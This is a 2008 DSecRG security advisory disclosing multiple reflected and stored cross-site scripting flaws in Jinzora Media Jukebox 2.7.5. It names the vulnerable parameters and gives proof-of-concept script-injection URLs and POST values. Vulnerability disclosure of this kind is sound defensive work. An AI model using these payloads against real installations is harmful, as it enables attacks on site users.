Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PR06-12: XSS on BEA Plumtree Foundation and AquaLogic Interaction portals

SmarterMail Enterprise 4.3  - malformed mail XSS

WoltLab Burning Board 3.0.3 PL1 SQL-Injection Vulnerability

PR08-01: Several XSS, a cross-domain redirect and a webroot disclosure on Spyce - Python Server Pages (PSP)

From:	Digital Security Research Group [DSecRG] <research_(at)_dsec.ru>
Date:	20.02.2008
Subject:	bugtraq@securityfocus.com, vuln@secunia.com, packet@packetstormsecurity.org

Digital Security Research Group [DSecRG] Advisory       #DSECRG-08-016


Application:                    Jinzora Media Jukebox
Versions Affected:              2.7.5
Vendor URL:                     http://www.jinzora.com/
Bugs:                           Multiple XSS Injections
Exploits:                       YES
Reported:                       04.02.2008
Second report:                  12.02.2008
Vendor response:                NONE
Date of Public Advisory:        19.02.2008
Authors:                        Alexandr Polyakov, Stas Svistunovich
                               Digital Security Research Group [DSecRG] (research [at] dsec [dot]
ru)



Description
***********

Jinzora system has multiple security vulnerabilities:

1. Linked XSS
2. Stored XSS



Details
*******

1. Multiple linked XSS vulnerabilities found. Attacker can inject XSS in URL string.


1.1 Linked XSS vulnerabiliies found in index.php.

GET parameters "frontend", "set_frontend", "jz_path", "theme", "set_theme".

Example:

http://[server]/[installdir]/index.php?frontend=<IMG SRC="javascript:alert('DSecRG XSS')">


1.2 Linked XSS vulnerabilities found in ajax_request.php.

GET parameters "frontend", "theme", "language".

Example:

http://[server]/[installdir]/ajax_request.php?language=<IMG SRC="javascript:alert('DSecRG XSS')">


1.3 Linked XSS vulnerability found in slim.php. GET parameter "jz_path".

Example:

http://[server]/[installdir]/slim.php?jz_path=<IMG SRC="javascript:alert('DSecRG XSS')">


1.4 Linked XSS vulnerabilities found in popup.php.

GET parameters "frontend", "theme", "jz_path".

Example:

http://[server]/[installdir]/popup.php?theme=<IMG SRC="javascript:alert('DSecRG XSS')">


1.5 Linked XSS in Path vulnerability found in index.php and slim.php.

Example:

http://[server]/[installdir]/index.
php/"><script>alert('DSecRG XSS')</script>

---------------------------------------------------------------------


2. Stored XSS

2.1 Vulnerability found in script popup.php?ptype=sitenews in post parameter name "siteNewsData"

Example:

siteNewsData = </textarea><script>alert('DSecRG XSS')</script>


2.1 Vulnerability found in script popup.php?ptype=playlistedit in post parameter name "query"

Example:

query = <script>alert('DSecRG XSS')</script>





About
*****

Digital Security is leading IT security company in Russia, providing information security
consulting, audit and penetration testing services, risk analysis and ISMS-related services and
certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses
on web application and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.


Contact:        research [at] dsec [dot] ru
               http://www.dsec.ru (in Russian)


--

 Digital Security Research Group  mailto:research@dsec.ru